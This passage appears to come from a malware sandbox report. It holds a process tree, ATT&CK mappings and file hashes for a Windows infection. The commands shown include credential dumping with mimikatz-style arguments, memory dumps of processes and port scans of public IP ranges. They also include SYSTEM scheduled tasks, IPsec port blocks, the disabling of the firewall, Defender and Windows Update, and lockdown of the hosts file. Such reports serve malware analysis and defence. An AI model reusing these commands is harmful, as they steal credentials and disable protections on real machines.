- System Location Discovery: System Language Discovery
PID:4324 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:736 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2868
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:2700 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3492
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:2000
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\vguwtuflb\imnwwtqyn\uzurgcimy.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\vguwtuflb\imnwwtqyn\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:2184 -
C:\Windows\vguwtuflb\imnwwtqyn\uzurgcimy.exeC:\Windows\vguwtuflb\imnwwtqyn\uzurgcimy.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\vguwtuflb\imnwwtqyn\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4136
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\vguwtuflb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\vguwtuflb\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1972 -
C:\Windows\vguwtuflb\Corporate\vfshost.exeC:\Windows\vguwtuflb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4704
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bnibimvud" /ru system /tr "cmd /c C:\Windows\ime\tsgwibn.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2524 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:112
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bnibimvud" /ru system /tr "cmd /c C:\Windows\ime\tsgwibn.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3284
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "sbtigywbq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\guiyywyg\tsgwibn.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:2180 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3664
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "sbtigywbq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\guiyywyg\tsgwibn.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4672
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "usblrgybd" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\sbymbrggy\werigg.exe /p everyone:F"2⤵PID:396
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1140
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "usblrgybd" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\sbymbrggy\werigg.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:5108
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4536
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1216
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2484
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4644
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:452
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2868
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2228
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3492
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4668
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4380
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2576
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1524
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
PID:1156 -
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
PID:2912 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
PID:4492
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:3576
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4848
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:3044
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:3708
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:4312
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:4840
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
PID:2232 -
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
PID:1276 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
- System Location Discovery: System Language Discovery
PID:4508
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
PID:5020 -
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
- System Location Discovery: System Language Discovery
PID:336 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
PID:5000
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:4672 -
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:3196
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:396 -
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1124
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:3520 -
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4084
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:1504 -
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2728
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1568
-
-
C:\Windows\TEMP\vguwtuflb\cumgbbwyg.exeC:\Windows\TEMP\vguwtuflb\cumgbbwyg.exe -accepteula -mp 796 C:\Windows\TEMP\vguwtuflb\796.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3448
-
-
C:\Windows\TEMP\vguwtuflb\cumgbbwyg.exeC:\Windows\TEMP\vguwtuflb\cumgbbwyg.exe -accepteula -mp 384 C:\Windows\TEMP\vguwtuflb\384.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
C:\Windows\TEMP\vguwtuflb\cumgbbwyg.exeC:\Windows\TEMP\vguwtuflb\cumgbbwyg.exe -accepteula -mp 2152 C:\Windows\TEMP\vguwtuflb\2152.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3280
-
-
C:\Windows\TEMP\vguwtuflb\cumgbbwyg.exeC:\Windows\TEMP\vguwtuflb\cumgbbwyg.exe -accepteula -mp 2556 C:\Windows\TEMP\vguwtuflb\2556.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4848
-
-
C:\Windows\TEMP\vguwtuflb\cumgbbwyg.exeC:\Windows\TEMP\vguwtuflb\cumgbbwyg.exe -accepteula -mp 2704 C:\Windows\TEMP\vguwtuflb\2704.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3328
-
-
C:\Windows\TEMP\vguwtuflb\cumgbbwyg.exeC:\Windows\TEMP\vguwtuflb\cumgbbwyg.exe -accepteula -mp 2804 C:\Windows\TEMP\vguwtuflb\2804.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1848
-
-
C:\Windows\TEMP\vguwtuflb\cumgbbwyg.exeC:\Windows\TEMP\vguwtuflb\cumgbbwyg.exe -accepteula -mp 3104 C:\Windows\TEMP\vguwtuflb\3104.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4056
-
-
C:\Windows\TEMP\vguwtuflb\cumgbbwyg.exeC:\Windows\TEMP\vguwtuflb\cumgbbwyg.exe -accepteula -mp 3936 C:\Windows\TEMP\vguwtuflb\3936.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1264
-
-
C:\Windows\TEMP\vguwtuflb\cumgbbwyg.exeC:\Windows\TEMP\vguwtuflb\cumgbbwyg.exe -accepteula -mp 4032 C:\Windows\TEMP\vguwtuflb\4032.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4496
-
-
C:\Windows\TEMP\vguwtuflb\cumgbbwyg.exeC:\Windows\TEMP\vguwtuflb\cumgbbwyg.exe -accepteula -mp 2988 C:\Windows\TEMP\vguwtuflb\2988.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3836
-
-
C:\Windows\TEMP\vguwtuflb\cumgbbwyg.exeC:\Windows\TEMP\vguwtuflb\cumgbbwyg.exe -accepteula -mp 2848 C:\Windows\TEMP\vguwtuflb\2848.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3812
-
-
C:\Windows\TEMP\vguwtuflb\cumgbbwyg.exeC:\Windows\TEMP\vguwtuflb\cumgbbwyg.exe -accepteula -mp 2372 C:\Windows\TEMP\vguwtuflb\2372.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3992
-
-
C:\Windows\TEMP\vguwtuflb\cumgbbwyg.exeC:\Windows\TEMP\vguwtuflb\cumgbbwyg.exe -accepteula -mp 1260 C:\Windows\TEMP\vguwtuflb\1260.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3620
-
-
C:\Windows\TEMP\vguwtuflb\cumgbbwyg.exeC:\Windows\TEMP\vguwtuflb\cumgbbwyg.exe -accepteula -mp 2468 C:\Windows\TEMP\vguwtuflb\2468.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
-
C:\Windows\TEMP\vguwtuflb\cumgbbwyg.exeC:\Windows\TEMP\vguwtuflb\cumgbbwyg.exe -accepteula -mp 2924 C:\Windows\TEMP\vguwtuflb\2924.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3028
-
-
C:\Windows\TEMP\vguwtuflb\cumgbbwyg.exeC:\Windows\TEMP\vguwtuflb\cumgbbwyg.exe -accepteula -mp 2648 C:\Windows\TEMP\vguwtuflb\2648.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4448
-
-
C:\Windows\TEMP\vguwtuflb\cumgbbwyg.exeC:\Windows\TEMP\vguwtuflb\cumgbbwyg.exe -accepteula -mp 4112 C:\Windows\TEMP\vguwtuflb\4112.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4696
-
-
C:\Windows\TEMP\vguwtuflb\cumgbbwyg.exeC:\Windows\TEMP\vguwtuflb\cumgbbwyg.exe -accepteula -mp 2684 C:\Windows\TEMP\vguwtuflb\2684.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2204
-
-
C:\Windows\TEMP\vguwtuflb\cumgbbwyg.exeC:\Windows\TEMP\vguwtuflb\cumgbbwyg.exe -accepteula -mp 4380 C:\Windows\TEMP\vguwtuflb\4380.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1720
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\vguwtuflb\imnwwtqyn\scan.bat2⤵PID:4968
-
C:\Windows\vguwtuflb\imnwwtqyn\wvwuinghb.exewvwuinghb.exe TCP 138.199.0.1 138.199.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3888
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:6092
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5652
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:5920
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:5976
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:5412
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:668
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:6060
-
-
-
C:\Windows\SysWOW64\ascsoo.exeC:\Windows\SysWOW64\ascsoo.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2540
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\sbymbrggy\werigg.exe /p everyone:F1⤵PID:2368
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:452
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\sbymbrggy\werigg.exe /p everyone:F2⤵PID:2212
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\guiyywyg\tsgwibn.exe /p everyone:F1⤵PID:3100
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:536
-
-
C:\Windows\system32\cacls.execacls C:\Windows\guiyywyg\tsgwibn.exe /p everyone:F2⤵PID:2388
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\tsgwibn.exe1⤵PID:4880
-
C:\Windows\ime\tsgwibn.exeC:\Windows\ime\tsgwibn.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4432
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\sbymbrggy\werigg.exe /p everyone:F1⤵PID:1828
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:5976
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\sbymbrggy\werigg.exe /p everyone:F2⤵PID:5536
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\guiyywyg\tsgwibn.exe /p everyone:F1⤵PID:112
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:4360
-
-
C:\Windows\system32\cacls.execacls C:\Windows\guiyywyg\tsgwibn.exe /p everyone:F2⤵PID:3512
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\tsgwibn.exe1⤵PID:4860
-
C:\Windows\ime\tsgwibn.exeC:\Windows\ime\tsgwibn.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6804
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
1.2MB
MD568b484002bc9180f3dcc37458143e478
SHA16ed328ee8d66b9951d9e0d9b707fe96cefa41539
SHA256a3840affc3996d5cef4ffcdfc8aed9af108259ab7360be0163b141ec4c126cbc
SHA51298bdb3c58cc16c563a89f30b66ea416b60dda367aebc561447e82d25aee1fa90d778b35b69204c02fb5522b8cd34b625d7200a7f909fc8426886e53c6d35e61c
-
Filesize
4.1MB
MD5c7acf0219c6f8f537dd71e79679c1c37
SHA19b8cb7c53880b00e02a33e71ac3c848932ead168
SHA256741d69117e2174265d6f861d1a4b26256f5483261129076516ac81a6ba099b7e
SHA5128c6d794724af330b6a0e06d1779e88ad730d3eebb254faa989cfca4d579f3f10cedf08bf432f1e95b93eb58ca53ccbb98a5ae0b2bbdb838ee4734682042ba59e
-
Filesize
25.9MB
MD58ca5d4f31a5e2b3249e2f1d471609621
SHA1adbaa9b1632a1f7c03d895ca0886e3075c6f5a82
SHA2562dbd48e2d1d411e442d2f824d1e1125ec43e04ed860ee6026f2b5253f28d04d6
SHA512b4b1fc8aa53b3d836f73c118c26c512b70be1260779f86fd0a66bc0b6d0bdcf2d66d01b19a70275b8bd35f244dc242c047853cf41e6ad48a7175f5156f714ee3
-
Filesize
8.9MB
MD5d1a319d0576b5f9cf7c56072c9b12cf0
SHA1b68004bae50a72f1047faca90606146d0ef30d11
SHA256c028998bc6fb182ecf40b78db130a27579491406bd1767c4cc737800d7886e46
SHA512447aef7ff89760e32be0a77d8d5067208ddfcc6b1ce0a5cd6f63381400bf6ccdd12bbaad7b544d255a5547fe5ec8ae1f72fc4be45b09521bda0ffe5825f11185
-
Filesize
3.8MB
MD5f86f8336f1be23b41d6cdde5188ed561
SHA1f97f522ea11726898c522126e58fe52e1af820d5
SHA25680fa6f3cc79fade5a838f6dada8b7eb9e66edd39f5348511515f6a5dd41c5d95
SHA51246c6e5700ac6a064e9934e2bc5863aba00f7397a4096a46bdc0a5a74f2e048a487389759303149f310daefaf1b2a9340c50fe642f68a95194ccd6dabc49e4e87
-
Filesize
2.9MB
MD584d42faa946815200d099b22930cd089
SHA129d1796ee2e94acf366e85d216d055cc83bad144
SHA25644fe74348b81d899457a81f36c26623165f4deb3ff80b94337f4a7d62e4c69bc
SHA512f21b52090a26f7c43737b03785a3ecfb31267a004f146b5c585e0eb4ba9b7d0db96b022e42448c3cf3ac4f4b824bfebbe802c6aa0b450832bc4ef06703e46fcc
-
Filesize
7.5MB
MD501e638098984348915a99810a337a739
SHA1db72e01c5bc8b3e79c9ad807d04663c4cb146dcd
SHA256b7d822e5788eb4cc8412d3b8c0981285ade680a2338058728e877ce4b394063d
SHA512c7814b0b9f0f04fb09f40c554be3fc06ffa0788e6afda2ae0805ef05f7418e12dad66f1c312717fc3f62ee714228351f694e1b40b08f6e9d8ab8a23edc973d1d
-
Filesize
43.8MB
MD5de092708fd28163c2b31048b6aa31b5b
SHA10dbe62eeeba53f9760a227a17c72ebb87571e9cf
SHA25608c1c2f09174fc25b3debed931ac8e38f7cc32cd895ecc56fafd2e08c0c888ac
SHA512e58f2d57ce0c78d9ea5e3a15ad4e8230ba44fd93be1939173cf9a3b0de98e6d76e1795818f28803139f7303820b63446097ff33b1e172290e665ff50c6efcb9a
-
Filesize
8.5MB
MD59bbb4254c5ffe6efef73a951c5cec142
SHA1364a1b79edf06699e3f06f2e102f0065c5a731a7
SHA256e807a012df9e5dc71ae129a11c6f1468d1251ec504a08b5e07e698af6683c434
SHA5124fd43b59df93200a60520a02d7b6d73e623ea9b65eadf4c9ecbd20db6c812688ce6bd4312c8fe042cddaaa07abb88911b64f7b5328851f25f70d25c8ae696691
-
Filesize
818KB
MD5a26382d63b4a9d0fa4eb1843b9ec8016
SHA16eeb9ef169812d957e80a54875e826d9357b0884
SHA256cef1164eaf063e86ea5f166c4cb72f93ba90a54602343be93d0ad8174ea1cc40
SHA5126f89f5a416c6e19add53e7ab6624d9c07b84d929f7b8fbae0ebb434f82def192418096df79d6fa575cc4674821608f6ef8ce6647841bd9d1c30fbdf821521302
-
Filesize
33.4MB
MD5d8952d82171c440f8ab589dc03c558c6
SHA17be13242dc32d73f6305ff0923d939febb0a6d9a
SHA256acaa591037dcafd117e550f51e9204d968ce84aeaf4ef8085ef8e092cca4418e
SHA5123ed734e171a1297f437838073c6b84a3854bfbf326a6076b5df537621562f7f29441e655537f9d2b98d34d29dff77a88d71ece0844a85eeaf2324cfe4b77d6bd
-
Filesize
3.1MB
MD5b28a7b237ce3784d0c707b0029f2dca3
SHA10ec971dd13c145512258b1cd0bf1656df0ec22db
SHA2566a31473ccc550d4c106a956dec620e90fc4285d0ace77ce787ed67ccea3c64f5
SHA512ff99c3b6f1eefcc984eaa2f2e220e4ba8995f96645cb363a4faaf17de8121d453e08025816f7f359a4ca6ccbbd69130c8c38cd2732ac0278784db6676128dbbe
-
Filesize
20.7MB
MD53d50a25a390cf7fa6f475017aa9a4406
SHA11b17e132906c66f30f7bd6a5dc53a19934a8f6ef
SHA256a87eb645b6d4c3b526385eb4c34be29c3729214c19b06e979edb5e2cb123c521
SHA5127c1f4c25967f4f298d7a80c5600397b03eb5a90e0a3a9191a2ecb7310d6a35b574b33655ea5e79e3f5aa9c47d36488f524aac281c0caa951372bc46f7dc9c3d6
-
Filesize
3.3MB
MD569a717b0bc044b27df8a6a91735a6e6c
SHA1a22d5fa2dd5bbd01fbdd380b0ed319700d98c976
SHA2560679e0617015524eb942059607745c68e6a965152fcd1deadbdab27a72131b02
SHA512103d4d92de264f0ad761f4860a53ec0567c5e22aeab2bc6aeb95f70a1c69cb08524b688585c9619c328fd64c1dc0db409dde86631a6e0e9eaba0afc53cff2e39
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
14.2MB
MD56c93eafa05a14f342a0fac6757bff6d5
SHA1b1d8222bacf378716f784d9fbe63c46ee7a3ef14
SHA256bc340de3bbf7de74d6fbc5943e6ea12a035ddb9619f01d5ba4308452bf1e85a3
